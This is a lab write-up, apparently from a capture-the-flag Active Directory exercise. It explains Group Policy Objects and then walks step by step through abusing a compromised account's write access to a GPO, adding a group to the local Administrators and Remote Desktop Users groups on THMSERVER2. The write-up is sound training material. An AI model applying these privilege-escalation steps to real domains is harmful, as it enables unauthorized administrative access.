Exploiting GPOs
Last time we decrypted the database and found out credentials of a user which was svcServMan. Now we further our exploitation by enumerating again and finding out where this leads us. Let's use the previous Sharphound data to check it out in Bloodhound.
One permission, in particular, stands out for this account, ownership over a Group Policy Object (GPO). Furthermore, when we do a bit of investigation, it seems like this GPO is applied to our THMSERVER2 machine:
Group Policy Objects
Remember when we discussed the SYSVOL directory in Enumerating AD? This is the directory where AD GPOs are stored to be replicated to domain-joined machines. A GPO is a virtual collection of policy settings. Each GPO has a unique name, called a GUID.
Each Windows computer has a Local Policy Configuration. This contains several notable configurations such as:
Application configuration for services such as the Firewall, Anti-Virus, and Applocker.
Local Group membership such as the Administrator or Remote Desktop Users groups.
Startup configuration such as scripts that should be executed.
Security and protocol settings such as SMBv1 support.
Group Policy Management
If you only have one Windows computer, it is easy to change the local policy configuration directly on the host. However, you need a mechanism to deploy a configuration from a central location in large organisations. This is where Group Policy Management (GPM) comes into play. Instead of defining policies locally on each machine, GPM allows us to define policies directly on the AD structure. Essentially, we can define GPOs for AD objects, such as a specific OU or group.
Domain-joined computers would then pull all policies from SYSVOL periodically and apply the relevant ones.
Exploiting GPOs
Because svcServMan has GenericWrite ACE, we will add the account to both the local Administrators and local Remote Desktop Users groups. This will allow us administrative privileges on THMSERVER2 and the ability to RDP in.
First we RDP into the Tier 2 admin user that we previously controlled
Run a new cmd using user svcServMan
Now open mmc
Adding Groups in the GPO
We now want to add the Group Policy Management snap-in:
Click File -> Add/Remove Snap-in
Select the Group Policy Management snap-in and click Add
Click Ok
We can now navigate to the GPO that our user has permission to modify (Servers > Management Servers> Management Server Pushes)
We can right-click on the GPO and select Edit. This will open the new Group Policy Management Editor window.
In order to add our account to the local groups, we need to perform the following steps:
Expand Computer Configuration
Expand Policies
Expand Windows Settings
Expand Security Settings
Right Click on Restricted Groups and select Add Group (If the IT Support group already exists, it means someone has already performed the exploit. You can either delete it to create it yourself, or just inspect it to see what was configured.)
Click Browse, enter IT Support and click Check Names
Click Okay twice
The first filter is not used. For the second filter, we want to add both the Administrators and Remote Desktop Users groups. In the end, it should look something like this:
Once the configuration has been made, we can click Apply and OK. Now, all we need to do is wait for a maximum of 15 minutes for the GPO to be applied. After this, our initial account that we made a member of the IT Support group will now have administrative and RDP permissions on THMSERVER2!
Now if the Tier 2 admin is not part of the IT Group just add him.
Log out and SSH into THMSERVER2 as the user
verify that we are in the IT Support group
Get the flag in Administrator's Desktop
Last updated